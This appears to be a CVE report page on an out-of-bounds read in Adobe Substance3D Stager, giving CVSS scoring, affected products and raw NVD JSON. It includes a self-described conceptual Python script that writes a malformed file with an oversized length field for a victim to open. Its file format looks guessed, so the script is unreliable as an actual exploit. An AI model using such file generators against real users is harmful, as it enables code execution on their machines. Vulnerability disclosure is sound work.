Security Vulnerability Report
CVE-2025-61806 CVSS 7.8 HIGH

CVE-2025-61806

Published: 2025-10-14 20:15:53
Last Modified: 2025-10-16 17:37:26

Description

Substance3D - Stager versions 3.1.4 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:adobe:substance_3d_stager:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Adobe Substance3D Stager <= 3.1.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-61806 - Adobe Substance3D Stager Out-of-Bounds Read PoC
# This is a conceptual PoC demonstrating the vulnerability trigger mechanism.
# The actual exploitation requires crafting a malicious file that causes
# the parser to read beyond allocated memory boundaries.

import struct
import os


def craft_malicious_stager_file(output_path):
    """
    Generate a crafted file that triggers out-of-bounds read
    in Substance3D Stager during file parsing.

    The vulnerability occurs when the parser fails to validate
    field lengths or offsets, leading to reads past allocated buffers.
    """
    # File header - mimics valid Substance3D Stager file format
    header = b'SBSR'  # Magic bytes
    header += struct.pack('<I', 1)  # Version

    # Malicious section with oversized length field
    # This triggers the OOB read when parser uses this value
    # to determine how much data to read from the buffer
    section_type = struct.pack('<I', 0x0A)  # Section type identifier

    # Intentionally oversized length value (0xFFFF = 65535 bytes)
    # Parser will attempt to read 65535 bytes from a much smaller buffer
    declared_length = struct.pack('<I', 0xFFFF)

    # Actual data is much smaller than declared length
    actual_data = b'\x00' * 64  # Only 64 bytes of actual data

    # Construct the malicious file
    malicious_content = header + section_type + declared_length + actual_data

    with open(output_path, 'wb') as f:
        f.write(malicious_content)

    print(f"[+] Crafted malicious file saved to: {output_path}")
    print(f"[!] File size: {len(malicious_content)} bytes")
    print(f"[!] Declared section length: 65535 bytes (causes OOB read)")
    print(f"[!] Actual data length: {len(actual_data)} bytes")
    print(f"\n[*] To trigger: Open this file in Substance3D Stager <= 3.1.4")


if __name__ == "__main__":
    output = "exploit_cve_2025_61806.sbs"
    craft_malicious_stager_file(output)

References

https://helpx.adobe.com/security/products/substance3d_stager/apsb25-104.html (Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-61806",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-14T20:15:53.257",
    "lastModified": "2025-10-16T17:37:26.160",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "Substance3D - Stager versions 3.1.4 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}
    ],
    "configurations": [
      {
        "operator": "AND",
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:substance_3d_stager:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.1.5", "matchCriteriaId": "AB3C6EBF-2CF4-413D-AC6B-AAF49BA08B2F"}
            ]
          },
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"},
              {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://helpx.adobe.com/security/products/substance3d_stager/apsb25-104.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}
    ]
  }
}